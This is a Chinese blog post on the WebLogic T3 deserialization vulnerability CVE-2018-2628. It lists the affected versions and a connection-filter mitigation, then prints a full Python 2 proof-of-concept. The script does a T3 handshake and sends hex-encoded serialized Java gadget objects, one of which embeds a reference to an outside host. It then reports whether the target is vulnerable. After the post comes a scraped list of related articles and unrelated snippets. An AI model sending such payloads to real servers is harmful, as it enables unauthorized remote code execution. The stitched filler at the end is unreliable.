Echo_Dream
Echo_Dream

CVE-2018-2628

      4月17日,爆发了Weblogic反序列化漏洞(CVE-2018-2628),通过该漏洞,攻击者可以在未授权的情况下远程执行代码。攻击者只需要发送精心构造的T3协议数据,就可以获取目标服务器的权限。攻击者可利用该漏洞控制组件,影响数据的可用性、保密性和完整性。

影响版本:

OracleWebLogicServer10.3.6.0

OracleWebLogicServer12.1.3.0

OracleWebLogicServer12.2.1.2

OracleWebLogicServer12.2.1.3

临时解决方案:

       可通过控制T3协议的访问来临时阻断针对该漏洞的攻击。WebLogic Server 提供了名为 weblogic.security.net.ConnectionFilterImpl 的默认连接筛选器,此连接筛选器接受所有传入连接,可通过此连接筛选器配置规则,对t3及t3s协议进行访问控制。

1.进入Weblogic控制台,在base_domain的配置页面中,进入“安全”选项卡页面,点击“筛选器”,进入连接筛选器配置。

2. 在连接筛选器中输入:weblogic.security.net.ConnectionFilterImpl,在连接筛选器规则中输入:* * 7001 deny t3 t3s。

3.保存规则后,根据提示是否进行重启应用。

附POC(仅用于漏洞验证):

#!env python

# -*- coding: utf-8 -*-

import socket

import time

import re

VUL=['CVE-2018-2628']

PAYLOAD=['aced0005737d00000001001d6a6176612e726d692e61637469766174696f6e2e416374697661746f72787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b78707372002d6a6176612e726d692e7365727665722e52656d6f74654f626a656374496e766f636174696f6e48616e646c657200000000000000020200007872001c6a6176612e726d692e7365727665722e52656d6f74654f626a656374d361b4910c61331e03000078707737000a556e6963617374526566000e3130342e3235312e3232382e353000001b590000000001eea90b00000000000000000000000000000078']

VER_SIG=['\\$Proxy[0-9]+']

def t3handshake(sock,server_addr):

    sock.connect(server_addr)

    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))

    time.sleep(1)

    sock.recv(1024)

    print 'handshake successful'

def buildT3RequestObject(sock,port):

    data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'

    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))

    data3 = '1a7727000d3234322e323134'

    data4 = '2e312e32353461863d1d0000000078'

    for d in [data1,data2,data3,data4]:

        sock.send(d.decode('hex'))

    time.sleep(2)

    print 'send request payload successful,recv length:%d'%(len(sock.recv(2048)))

def sendEvilObjData(sock,data):

    payload='056508000000010000001b0000005d010100737201787073720278700000000000000000757203787000000000787400087765626c6f67696375720478700000000c9c979a9a8c9a9bcfcf9b939a7400087765626c6f67696306fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200025b42acf317f8060854e002000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200106a6176612e7574696c2e566563746f72d9977d5b803baf010300034900116361706163697479496e6372656d656e7449000c656c656d656e74436f756e745b000b656c656d656e74446174617400135b4c6a6176612f6c616e672f4f626a6563743b78707702000078fe010000'

    payload+=data

    payload+='fe010000aced0005737200257765626c6f6769632e726a766d2e496d6d757461626c6553657276696365436f6e74657874ddcba8706386f0ba0c0000787200297765626c6f6769632e726d692e70726f76696465722e426173696353657276696365436f6e74657874e4632236c5d4a71e0c0000787077020600737200267765626c6f6769632e726d692e696e7465726e616c2e4d6574686f6444657363726970746f7212485a828af7f67b0c000078707734002e61757468656e746963617465284c7765626c6f6769632e73656375726974792e61636c2e55736572496e666f3b290000001b7878fe00ff'

    payload = '%s%s'%('{:08x}'.format(len(payload)/2 + 4),payload)

    sock.send(payload.decode('hex'))

    time.sleep(2)

    sock.send(payload.decode('hex'))

    res = ''

    try:

        while True:

            res += sock.recv(4096)

            time.sleep(0.1)

    except Exception as e:

        pass

    return res

def checkVul(res,server_addr,index):

    p=re.findall(VER_SIG[index], res, re.S)

    if len(p)>0:

        print '%s:%d is vul %s'%(server_addr[0],server_addr[1],VUL[index])

    else:

        print '%s:%d is not vul %s' % (server_addr[0],server_addr[1],VUL[index])

def run(dip,dport,index):

    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    sock.settimeout(65)

    server_addr = (dip, dport)

    t3handshake(sock,server_addr)

    buildT3RequestObject(sock,dport)

    rs=sendEvilObjData(sock,PAYLOAD[index])

#  print 'rs',rs

    checkVul(rs,server_addr,index)

if __name__=="__main__":

    dip = '10.10.0.10'

    dport = 7001

    run(dip,dport,0)

你可能感兴趣的:(CVE-2018-2628)

  • weblogic反序列化之T3协议(CVE-2015-4582) Ys3ter java安全javajava安全
    基于T3协议的weblogic反序列化漏洞之前说过在weblogic里面其实反序列化漏洞利用中大致分为两种,一个是基于T3协议的反序列化漏洞,一个是基于XML的反序列化漏洞,这篇来分析一下基于T3协议的weblogic,列出几个基于T3协议具有代表性的CVE:CVE-2015-4582、CVE-2016-0638、CVE-2016-3510、CVE-2018-2628、CVE-2020-2555、
  • CVE-2018-2893:Oracle WebLogic Server 远程代码执行漏洞分析预警 道书简
    0x00漏洞描述  7月18日,Oracle官方发布了季度补丁更新,其中修复了一个OracleWebLogicServer远程代码执行漏洞CVE-2018-2893,此漏洞是对编号为CVE-2018-2628修复的绕过,攻击者同样可以在未身份验证的情况下对WebLogic进行攻击。目前相关PoC已经公开,建议相关用户尽快进行评估升级。0x01漏洞影响面  影响版本:  WebLogic10.3.6
  • weblogic漏洞复现整理汇总(vulhub) nzyp_ 安全开发语言
    weblogic漏洞复现整理汇总(vulhub)目录weblogic漏洞复现整理汇总(vulhub)一、概述二、任意文件上传漏洞(CVE-2018-2894)三、XMLDecoder反序列化漏洞(CVE-2017-10271)四、反序列化漏洞(CVE-2018-2628)五、未授权命令执行漏洞(CVE-2020-14882)根据vulhub已有的复现环境,对weblogic漏洞复现进行一个汇总,包
  • 2018-04-25 baitu
    线上账务系统余额并发更新问题记录物联网技术周报第134期:智能音箱Alexa与Arduino制作家门口的安全快递柜WebLogic反序列化漏洞(CVE-2018-2628)漫谈如何在Linux中使用LVM创建和扩展交换分区
  • Weblogic反序列化漏洞(CVE-2018-2628/CVE-2023-21839复现) rumilc Web安全漏洞复现web安全网络安全
    内容目录Weblogic反序列化漏洞(CVE-2018-2628/CVE-2023-21839)weblogic中间件CVE-2018-2628漏洞描述影响版本漏洞复现修复方案CVE-2023-21839漏洞描述影响版本漏洞复现修复方案Weblogic反序列化漏洞(CVE-2018-2628/CVE-2023-21839)weblogic中间件WebLogic是美国Oracle公司出品的一个app
  • CVE-2018-2628 zhenx1n
    环境搭建weblogic靶机:dockerpullzhiqzhao/ubuntu_weblogic1036_domaindockerimagesdockerrun-d-p7001:7001zhiqzhao/ubuntu_weblogic1036_domain攻击的服务器:java+python2环境即可docker学习笔记:https://www.evernote.com/shard/s461/s
  • 【漏洞复现】CVE-2018-2893 weblogic WLS核心组件反序列化漏洞 littlebin404
    漏洞介绍Oracle官方发布了4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628),该漏洞修补不善导致被绕过。Oracle官方发布的7月份补丁中修复了该漏洞,分配了漏洞编号CVE-2018-2893。通过该漏洞,攻击者可以在未授权的情况下远程执行代码。攻击者只需要发送精心构造的T3协议数据,就可以获取目标
  • Weblogic反序列化漏洞(CVE-2018-2628) 学安全的废物 漏洞复现dockerweb安全java
    一、漏洞成因攻击者利用RMI绕过weblogic黑名单限制,将加载的内容利用readObject解析,造成反序列化漏洞,该漏洞主要由于T3协议触发,所有开放weblogic控制台7001端口,默认开启T3服务,攻击者发送构造好的T3协议数据,获取目标服务器的权限。RMI:Java的一组拥护开发分布式应用程序的API,实现了不同操作系统之间程序的方法调用。值得注意的是,RMI的传输100%基于反序列
  • [渗透测试笔记] 56.日薪2k的蓝队hw中级定级必备笔记系列篇4之面试必备web中间件漏洞汇总 H4ppyD0g 渗透测试笔记面试前端
    文章目录1.Weblogic1.1任意文件上传漏洞(CVE-2018-2894)1.2XML远程代码执行RCE漏洞(CVE-2020-14882)1.3SSRF漏洞(CVE-2014-4210)1.4Java反序列化漏洞(CVE-2018-2628)2.Nginx2.1解析漏洞2.2Nginx文件名逻辑漏洞(CVE-2013-4547)2.3Nginx越界读取缓存漏洞(CVE-2017-7529)
  • Weblogic T3协议反序列化漏洞(CVE-2018-2628) 風月长情 #漏洞复现weblogicweblogic漏洞weblogic反序列化漏洞反序列化漏洞t3反序列化漏洞
    文章目录一、漏洞介绍1.1漏洞详情1.2基本原理1.3影响版本二、环境搭建三、攻击过程3.1信息收集3.2漏洞探测3.3攻击操作3.4流量走向四、修复方法一、漏洞介绍1.1漏洞详情  开放Weblogic控制台的7001端口,默认会开启T3协议服务,T3协议触发的WeblogicServerWLSCoreComponents中存在反序列化漏洞,攻击者可以发送构造的恶意T3协议数据,获取目标服务器权
  • Weblogic-JAVA反序列化(CVE-2018-2628) 贫僧法号云空丶 漏洞复现网络安全web安全weblogic
    weblogic-JAVA反序列化(CVE-2018-2628)漏洞复现-CVE-2018-26280x00前言该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。影响版本:OracleWeblogicServer10.3.6.0OracleWeblogicServer12.1.3.0OracleWeblogicServer12.2.1.2OracleWeblogicServer1
  • CVE-2018-2628 Echo_Dream
    4月17日,爆发了Weblogic反序列化漏洞(CVE-2018-2628),通过该漏洞,攻击者可以在未授权的情况下远程执行代码。攻击者只需要发送精心构造的T3协议数据,就可以获取目标服务器的权限。攻击者可利用该漏洞控制组件,影响数据的可用性、保密性和完整性。影响版本:OracleWebLogicServer10.3.6.0OracleWebLogicServer12.1.3.0OracleWeb
  • Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628) 为了嫖md编辑器到自己的博客 Weblogic漏洞复现web安全
    WeblogicWLSCoreComponents反序列化命令执行漏洞(CVE-2018-2628)复现环境:vulhub漏洞原因:WeblogicServerWLSCoreComponents中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。复现过程:启动一个执行反弹shell的一个JRMPServer:payload:j
  • 【渗透测试】Weblogic系列漏洞 离陌lm 网络安全web安全网络安全安全
    目录CVE-2017-10271(WeblogicXMLDecoder反序列化漏洞)1、漏洞原理2、影响版本3、漏洞验证4、修复方案CVE-2018-2628(WeblogicT3协议反序列化漏洞)1、漏洞原理2、影响版本3、漏洞验证4、修复方案CVE-2018-2894(WebLogic任意文件上传漏洞)1、漏洞原理2、影响版本3、漏洞验证4、修复方案CVE-2020-14882、CVE-202
  • Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628) 天猫来下凡 weblogic漏洞复现web安全
    WeblogicWLSCoreComponents反序列化命令执行漏洞(CVE-2018-2628)1.漏洞介绍:Oracle2018年4月补丁中,修复了WeblogicServerWLSCoreComponents中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。2.环境搭建在vulhub中使用docker拉取镜像,启动环
  • 常见中间件漏洞复现 君莫hacker vulhub漏洞复现中间件tomcat安全漏洞apache
    目录Tomcat1.Tomcat文件上传(CVE-2017-12615)2.Tomcat代码执行(CVE-2020-1938)3.Tomcat弱口令登录获取后台Weblogic4.Weblogic反序列化漏洞获取服务器权限(CVE-2018-10271)5.Weblogic反序列化漏洞实现反弹shel(CVE-2018-2628)6.Weblogic任意文件上传漏洞(CVE-2018-2894)7
  • [Vulhub] Weblogic 漏洞复现 DDao_blog 漏洞复现weblogic渗透测试漏洞复现
    文章目录Weblogic常规渗透测试环境0x00测试环境0x01弱口令0x02任意文件读取漏洞的利用0x03后台上传webshellWeblogicWLSCoreComponents反序列化命令执行漏洞(CVE-2018-2628)0x00漏洞描述0x01影响版本0x02漏洞分析0x03漏洞复现Weblogic任意文件上传漏洞(CVE-2018-2894)0x00漏洞描述0x01影响版本0x02漏
  • Weblogic反序列化命令执行漏洞(CVE-2018-2628)复现 君莫hacker vulhub漏洞复现linux安全漏洞网络安全
    目录0x01漏洞介绍0x02环境部署:0x03漏洞复现1.查看T3服务2.下载检测漏洞脚本,并进行解压3.设置所要检测的ip,并运行脚本4.启动JRMPServer5.制作Payload6.导入Payload并修改目的IP7.进行监听端口12348.执行脚本weblogic_poc.py9.反弹shell成功0x04漏洞修复0x01漏洞介绍漏洞描述WeblogicServerWLSCoreComp
  • WebLogic 反序列化远程代码执行漏洞(CVE-2018-2628)漏洞复现 低调求发展
    漏洞概述:在WebLogic里,攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行该漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻击者发送构造好的T3协议数据,就可以获取目标服务器的权限。影响版本:Weblogic10.3.6.0,Weblogic12.1.3.0,W
  • WebLogic反序列化漏洞CVE-2018-2628漏洞检测与利用 tdcoming 漏洞利用WEB安全
    Oracle官方发布了4月份的关键补丁更新CPU(CriticalPatchUpdate),其中包含Weblogic反序列化漏洞可导致远程代码执行漏洞,漏洞威胁等级为高危,对应的CVE编号为CVE-2018-26影响版本OracleWebLogicServer10.3.6.0OracleWebLogicServer12.2.1.2OracleWebLogicServer12.2.1.3Oracle
  • Vulnhub-Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628) M0nkeyK1ng
    郑重声明:所用漏洞环境为自建虚拟机vulnhub靶机环境,仅供本人学习使用。漏洞简述Oracle2018年4月补丁中,修复了WeblogicServerWLSCoreComponents中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。影响版本:10.3.6.0、12.1.3.0、12.2.1.2、12.2.1.3准备环境测
  • Web 服务器安全之 Weblogic 漏洞重现与攻防实战 技术杂谈哈哈哈
    本场chat介绍Weblogic常见的漏洞,其中包括:弱口令、Java反序列化、XMLdecoder反序列化、SSRF漏洞、任意文件上传,并根据其漏洞,使用Docker+Vulhub进行复现。主要内容环境搭建简单介绍Weblogic常见漏洞Weblogic弱口令复现操作Java反序列化漏洞操作(CVE-2018-2628)任意文件上传漏洞操作(CVE-2018-2894)XMLDecoder反序列
  • cve-2018-2628 Weblogic反序列化漏洞实现反弹shell whatday
    测试机:MacBook-Air测试机IP:192.168.0.100靶机IP:192.168.0.100:7001环境:docker工具:CVE-2018-2628漏洞利用工具包下载一.环境搭建将环境vulhub的环境git到本地gitclonehttps://github.com/vulhub/vulhub.git接着cdweblogic/CVE-2018-2628输入docker-compos
  • 远程命令执行与反序列化——Weblogic中间件反序列化漏洞及相关 温柔小薛 web渗透测试与代码审计#+远程命令执行与反序列化漏洞#+中间件漏洞与框架漏洞
    Weblogic中间件反序列化漏洞及相关常见漏洞有那些:弱口令、Java反序列化漏洞操作(CVE-2018-2628)、任意文件上传漏洞操作(CVE-2018-2894)、XMLDecoder反序列化漏洞操作(CVE-2017-10271)、SSRF漏洞(需要安装Weblogic时选择UDDI组件)、反序列化漏洞(CVE-2019-2725参考https://www.0dayhack.com/po
  • weblogic之CVE-2017-3248,CVE-2018-2628,CVE-2018-2893,CVE-2018-3245反序列绕过分析 weixin_30820151
    说一下复现CVE-2017-3248可以参考p牛的环境,p牛的环境CVE-2018-2628实际就是CVE-2017-3248,他漏洞编号这块写错了。攻击流程就如下图,攻击者开启JRMPListener监听在1099端口,等待受害者链接,当受害者链接时,把gadgets返回给客户端:CVE-2017-3248以后的漏洞都是利用了JRMPjava远程方法协议,利用java.rmi.registry.
  • Weblogic反序列化远程命令执行漏洞(CNVD-C-2019-48814)测试 weixin_30362801
    漏洞简介2018年4月18日,Oracle官方发布了4月份的安全补丁更新CPU(CriticalPatchUpdate),更新中修复了一个高危的WebLogic反序列化漏洞CVE-2018-2628。攻击者可以在未授权的情况下通过T3协议对存在漏洞的WebLogic组件进行远程攻击,并可获取目标系统所有权限。漏洞影响Weblogic10.3.6.0Weblogic12.1.3.0Weblogic1
  • Weblogic反序列化漏洞(CVE-2018-2628)实现反弹shell BeckGeGe 渗透测试反序列化漏洞复现
    Weblogic反序列化漏洞(CVE-2018-2628)反弹shell技术无罪,请勿用于恶意用途转载请注明出处!看见大部分复现教程都是弹计算器,创建文件夹,对于一些人来说不能满足需求,所以我准备做一个反弹shell的复现。测试机:MacBook-Air测试机IP:192.168.0.100靶机IP:192.168.0.100:7001环境:docker工具:CVE-2018-2628漏洞利用工具
  • Java反序列化漏洞之——weblogic反序列化漏洞(CVE-2018-2628) Stephen Wolf 精密还原案发现场
    一、Java序列化与反序列化Java序列化是指把Java对象转换为字节序列的过程便于保存在内存、文件、数据库中,ObjectOutputStream类的writeObject()方法可以实现序列化。Java反序列化是指把字节序列恢复为Java对象的过程,ObjectInputStream类的readObject()方法用于反序列化。序列化与反序列化是让Java对象脱离Java运行环境的一种手段,可
  • Weblogic反序列化漏洞(CVE-2018-2628),T3协议白名单 三三得九_尚 weblogic
    2018年4月18日凌晨,Oracle官方发布了4月份的关键补丁更新,其中包含一个高危的Weblogic反序列化漏洞(CVE-2018-2628),通过该漏洞,攻击者可以在未授权的情况下远程执行代码。攻击者只需要发送精心构造的T3协议数据,就可以获取目标服务器的权限。受影响版本范围:OracleWebLogicServer10.3.6.0OracleWebLogicServer12.1.3.0Or
  • WebLogic 反序列化远程代码执行漏洞(CVE-2018-2628) SoulCat. CVE中间件
    WebLogic反序列化远程代码执行漏洞(CVE-2018-2628)漏洞概述:在WebLogic里,攻击者利用其他rmi绕过weblogic黑名单限制,然后在将加载的内容利用readObject解析,从而造成反序列化远程代码执行该漏洞,该漏洞主要由于T3服务触发,所有开放weblogic控制台7001端口,默认会开启T3服务,攻击者发送构造好的T3协议数据,就可以获取目标服务器的权限。漏洞版本:
  • java观察者模式 3213213333332132 java设计模式游戏观察者模式
    观察者模式——顾名思义,就是一个对象观察另一个对象,当被观察的对象发生变化时,观察者也会跟着变化。 在日常中,我们配java环境变量时,设置一个JAVAHOME变量,这就是被观察者,使用了JAVAHOME变量的对象都是观察者,一旦JAVAHOME的路径改动,其他的也会跟着改动。 这样的例子很多,我想用小时候玩的老鹰捉小鸡游戏来简单的描绘观察者模式。 老鹰会变成观察者,母鸡和小鸡是
  • TFS RESTful API 模拟上传测试 ronin47
           TFS RESTful API 模拟上传测试。    细节参看这里:https://github.com/alibaba/nginx-tfs/blob/master/TFS_RESTful_API.markdown 模拟POST上传一个图片: curl --data-binary @/opt/tfs.png http
  • PHP常用设计模式单例, 工厂, 观察者, 责任链, 装饰, 策略,适配,桥接模式 dcj3sjt126com 设计模式PHP
    // 多态, 在JAVA中是这样用的, 其实在PHP当中可以自然消除, 因为参数是动态的, 你传什么过来都可以, 不限制类型, 直接调用类的方法 abstract class Tiger { public abstract function climb(); } class XTiger extends Tiger { public function climb()
  • hibernate 171815164 Hibernate
    main,save Configuration conf =new Configuration().configure(); SessionFactory sf=conf.buildSessionFactory(); Session sess=sf.openSession(); Transaction tx=sess.beginTransaction(); News a=new
  • Ant实例分析 g21121 ant
            下面是一个Ant构建文件的实例,通过这个实例我们可以很清楚的理顺构建一个项目的顺序及依赖关系,从而编写出更加合理的构建文件。           下面是build.xml的代码: <?xml version="1
  • [简单]工作记录_接口返回405原因 53873039oycg 工作
             最近调接口时候一直报错,错误信息是:       responseCode:405 responseMsg:Method Not Allowed        接口请求方式Post.
  • 关于java.lang.ClassNotFoundException 和 java.lang.NoClassDefFoundError 的区别 程序员是怎么炼成的
       真正完成类的加载工作是通过调用 defineClass来实现的;  而启动类的加载过程是通过调用 loadClass来实现的;  就是类加载器分为加载和定义   protected Class<?> findClass(String name) throws ClassNotFoundExcept
  • JDBC学习笔记-JDBC详细的操作流程 aijuans jdbc
    所有的JDBC应用程序都具有下面的基本流程:  1、加载数据库驱动并建立到数据库的连接。  2、执行SQL语句。  3、处理结果。  4、从数据库断开连接释放资源。 下面我们就来仔细看一看每一个步骤: 其实按照上面所说每个阶段都可得单独拿出来写成一个独立的类方法文件。共别的应用来调用。 1、加载数据库驱动并建立到数据库的连接:   Html代码  St
  • rome创建rss antonyup_2006 tomcatcmsxmlstrutsOpera
    引用 1.RSS标准 RSS标准比较混乱,主要有以下3个系列 RSS 0.9x / 2.0 : RSS技术诞生于1999年的网景公司(Netscape),其发布了一个0.9版本的规范。2001年,RSS技术标准的发展工作被Userland Software公司的戴夫 温那(Dave Winer)所接手。陆续发布了0.9x的系列版本。当W3C小组发布RSS 1.0后,Dave W
  • html表格和表单基础 百合不是茶 html表格表单meta锚点
    第一次用html来写东西,感觉压力山大,每次看见别人发的都是比较牛逼的 再看看自己什么都还不会,   html是一种标记语言,其实很简单都是固定的格式   _----------------------------------------表格和表单 表格是html的重要组成部分,表格用在body里面的 主要用法如下; <table> &
  • ibatis如何传入完整的sql语句 bijian1013 javasqlibatis
            ibatis如何传入完整的sql语句?进一步说,String str ="select * from test_table",我想把str传入ibatis中执行,是传递整条sql语句。         解决办法: <
  • 精通Oracle10编程SQL(14)开发动态SQL bijian1013 oracle数据库plsql
    /* *开发动态SQL */ --使用EXECUTE IMMEDIATE处理DDL操作 CREATE OR REPLACE PROCEDURE drop_table(table_name varchar2) is sql_statement varchar2(100); begin sql_statement:='DROP TABLE '||table_name;
  • 【Linux命令】Linux工作中常用命令 bit1129 linux命令
    不断的总结工作中常用的Linux命令   1.查看端口被哪个进程占用   通过这个命令可以得到占用8085端口的进程号,然后通过ps -ef|grep 进程号得到进程的详细信息   netstat -anp | grep 8085   察看进程ID对应的进程占用的端口号   netstat -anp | grep 进程ID &
  • 优秀网站和文档收集 白糖_ 网站
    集成 Flex, Spring, Hibernate 构建应用程序   性能测试工具-JMeter   Hmtl5-IOCN网站   Oracle精简版教程网站   鸟哥的linux私房菜   Jetty中文文档   50个jquery必备代码片段   swfobject.js检测flash版本号工具
  • angular.extend boyitech AngularJSangular.extendAngularJS API
    angular.extend 复制src对象中的属性去dst对象中. 支持多个src对象. 如果你不想改变一个对象,你可以把dst设为空对象{}: var object = angular.extend({}, object1, object2). 注意: angular.extend不支持递归复制. 使用方法: angular.extend(dst, src); 参数:
  • java-谷歌面试题-设计方便提取中数的数据结构 bylijinnan java
    网上找了一下这道题的解答,但都是提供思路,没有提供具体实现。其中使用大小堆这个思路看似简单,但实现起来要考虑很多。 以下分别用排序数组和大小堆来实现。 使用大小堆: import java.util.Arrays; public class MedianInHeap { /** * 题目:设计方便提取中数的数据结构 * 设计一个数据结构,其中包含两个函数,1.插
  • ajaxFileUpload 针对 ie jquery 1.7+不能使用问题修复版本 Chen.H ajaxFileUploadie6ie7ie8ie9
    jQuery.extend({ handleError: function( s, xhr, status, e ) { // If a local callback was specified, fire it if ( s.error ) { s.error.call( s.context || s, xhr, status, e ); }
  • [机器人制造原则]机器人的电池和存储器必须可以替换 comsci 制造
           机器人的身体随时随地可能被外来力量所破坏,但是如果机器人的存储器和电池可以更换,那么这个机器人的思维和记忆力就可以保存下来,即使身体受到伤害,在把存储器取下来安装到一个新的身体上之后,原有的性格和能力都可以继续维持.....        另外,如果一
  • Oracle Multitable INSERT 的用法 daizj oracle
    转载Oracle笔记-Multitable INSERT 的用法 http://blog.chinaunix.net/uid-8504518-id-3310531.html 一、Insert基础用法 语法:     Insert Into 表名 (字段1,字段2,字段3...)     Values (值1,
  • 专访黑客历史学家George Dyson datamachine on
    20世纪最具威力的两项发明——核弹和计算机出自同一时代、同一群年青人。可是,与大名鼎鼎的曼哈顿计划(第二次世界大战中美国原子弹研究计划)相 比,计算机的起源显得默默无闻。出身计算机世家的历史学家George Dyson在其新书《图灵大教堂》(Turing’s Cathedral)中讲述了阿兰·图灵、约翰·冯·诺依曼等一帮子天才小子创造计算机及预见计算机未来
  • 小学6年级英语单词背诵第一课 dcj3sjt126com englishword
    always 总是 rice 水稻,米饭 before 在...之前 live 生活,居住   usual 通常的 early 早的 begin 开始 month 月份   year 年 last 最后的 east 东方的 high 高的   far 远的 window 窗户 world 世界 than 比...更  
  • 在线IT教育和在线IT高端教育 dcj3sjt126com 教育
    codecademy  http://www.codecademy.com codeschool  https://www.codeschool.com teamtreehouse  http://teamtreehouse.com lynda http://www.lynda.com/ Coursera https://www.coursera.
  • Struts2 xml校验框架所定义的校验文件 蕃薯耀 Struts2 xml校验Struts2 xml校验框架Struts2校验
      >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> 蕃薯耀 2015年7月11日 15:54:59 星期六 http://fa
  • mac下安装rar和unrar命令 hanqunfeng mac
    1.下载:http://www.rarlab.com/download.htm 选择 RAR 5.21 for Mac OS X 2.解压下载后的文件 tar -zxvf rarosx-5.2.1.tar 3.cd rar sudo install -c -o $USER unrar /bin #输入当前用户登录密码 sudo install -c -o $USER rar
  • 三种将list转换为map的方法 jackyrong list
      在本文中,介绍三种将list转换为map的方法: 1) 传统方法 假设有某个类如下    class Movie { private Integer rank; private String description; public Movie(Integer rank, String des
  • 年轻程序员需要学习的5大经验 lampcy 工作PHP程序员
    在过去的7年半时间里,我带过的软件实习生超过一打,也看到过数以百计的学生和毕业生的档案。我发现很多事情他们都需要学习。或许你会说,我说的不就是某种特定的技术、算法、数学,或者其他特定形式的知识吗?没错,这的确是需要学习的,但却并不是最重要的事情。他们需要学习的最重要的东西是“自我规范”。这些规范就是:尽可能地写出最简洁的代码;如果代码后期会因为改动而变得凌乱不堪就得重构;尽量删除没用的代码,并添加
  • 评“女孩遭野蛮引产致终身不育 60万赔偿款1分未得”医腐深入骨髓 nannan408
    先来看南方网的一则报道: 再正常不过的结婚、生子,对于29岁的郑畅来说,却是一个永远也无法实现的梦想。从2010年到2015年,从24岁到29岁,一张张新旧不一的诊断书记录了她病情的同时,也清晰地记下了她人生的悲哀。   粗暴手术让人发寒   2010年7月,在酒店做服务员的郑畅发现自己怀孕了,可男朋友却联系不上。在没有和家人商量的情况下,她决定堕胎。   12月5日,
  • 使用jQuery为input输入框绑定回车键事件 VS 为a标签绑定click事件 Everyday都不同 jspinput回车键绑定clickenter
    假设如题所示的事件为同一个,必须先把该js函数抽离出来,该函数定义了监听的处理:   function search() { //监听函数略...... }   为input框绑定回车事件,当用户在文本框中输入搜索关键字时,按回车键,即可触发search():   //回车绑定 $(".search").keydown(fun
  • EXT学习记录 tntxia ext
      1. 准备   (1) 官网:http://www.sencha.com/   里面有源代码和API文档下载。   EXT的域名已经从www.extjs.com改成了www.sencha.com ,但extjs这个域名会自动转到sencha上。   (2)帮助文档:   想要查看EXT的官方文档的话,可以去这里h
  • mybatis3的mapper文件报Referenced file contains errors xingguangsixian mybatis
